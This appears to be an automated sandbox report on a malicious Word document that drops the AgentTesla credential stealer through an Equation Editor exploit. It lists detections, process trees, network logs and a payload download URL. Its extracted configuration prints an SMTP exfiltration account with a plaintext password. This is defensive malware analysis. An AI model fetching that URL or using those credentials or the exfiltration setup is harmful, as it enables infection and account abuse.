Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Swift.doc

Overview

General Information

Sample name:Payment Swift.doc
Analysis ID:1431944
MD5:67fea5000046ad95ddf9707506002eaa
SHA1:b41f04ef65206c9f0305cc0b124dc9a58f1fe0aa
SHA256:b8fa7245705f07d10b2f028be43ba688ca78ddc224665a2da85d529c124725b1
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AgentTesla
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: SCR File Write Event
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2940 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2452 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • microme09255.scr (PID: 3176 cmdline: "C:\Users\user\AppData\Roaming\microme09255.scr" MD5: 75DC78C375DFEE9C0B96FA476BCD5D1C)
        • microme09255.scr (PID: 3204 cmdline: "C:\Users\user\AppData\Roaming\microme09255.scr" MD5: 75DC78C375DFEE9C0B96FA476BCD5D1C)
    • EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}
SourceRuleDescriptionAuthorStrings
Payment Swift.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x751e:$obj2: \objdata
  • 0x7538:$obj3: \objupdate
  • 0x74fa:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x64c6b:$x1: In$J$ct0r
00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          5.2.microme09255.scr.47c0000.7.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x62e6b:$x1: In$J$ct0r
          5.2.microme09255.scr.332dd90.4.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x62e6b:$x1: In$J$ct0r
          5.2.microme09255.scr.344a420.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.microme09255.scr.344a420.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.microme09255.scr.344a420.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x31671:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x316e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x3176d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x317ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x31869:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x318db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x31971:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x31a01:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              Click to see the 16 entries

              System Summary

              barindex
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.83.128, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2452, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\microme09255.scr", CommandLine: "C:\Users\user\AppData\Roaming\microme09255.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\microme09255.scr, NewProcessName: C:\Users\user\AppData\Roaming\microme09255.scr, OriginalFileName: C:\Users\user\AppData\Roaming\microme09255.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2452, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\microme09255.scr", ProcessId: 3176, ProcessName: microme09255.scr
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr
              Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\microme09255.scr, QueryName: api.ipify.org
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2940, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://covid19help.top/microm.scrjAvira URL Cloud: Label: malware
              Source: https://covid19help.top/microm.scrC:Avira URL Cloud: Label: malware
              Source: https://covid19help.top/microm.scrAvira URL Cloud: Label: phishing
              Source: https://covid19help.top/tAvira URL Cloud: Label: malware
              Source: https://covid19help.top/microm.scrkkC:Avira URL Cloud: Label: malware
              Source: https://covid19help.top/microm.scrYAvira URL Cloud: Label: malware
              Source: 5.2.microme09255.scr.344a420.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}
              Source: covid19help.topVirustotal: Detection: 24%Perma Link
              Source: https://covid19help.top/microm.scrVirustotal: Detection: 21%Perma Link
              Source: Payment Swift.docReversingLabs: Detection: 43%
              Source: Payment Swift.docVirustotal: Detection: 45%Perma Link
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scrJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\microme09255.scrJoe Sandbox ML: detected

              Exploits

              barindex
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.83.128 Port: 443Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\microme09255.scr
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\microme09255.scrJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49162 version: TLS 1.2
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: microme09255.scr, 00000005.00000002.348544360.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000005.00000002.348261996.0000000000230000.00000004.08000000.00040000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: global trafficDNS query: name: covid19help.top
              Source: global trafficDNS query: name: api.ipify.org
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
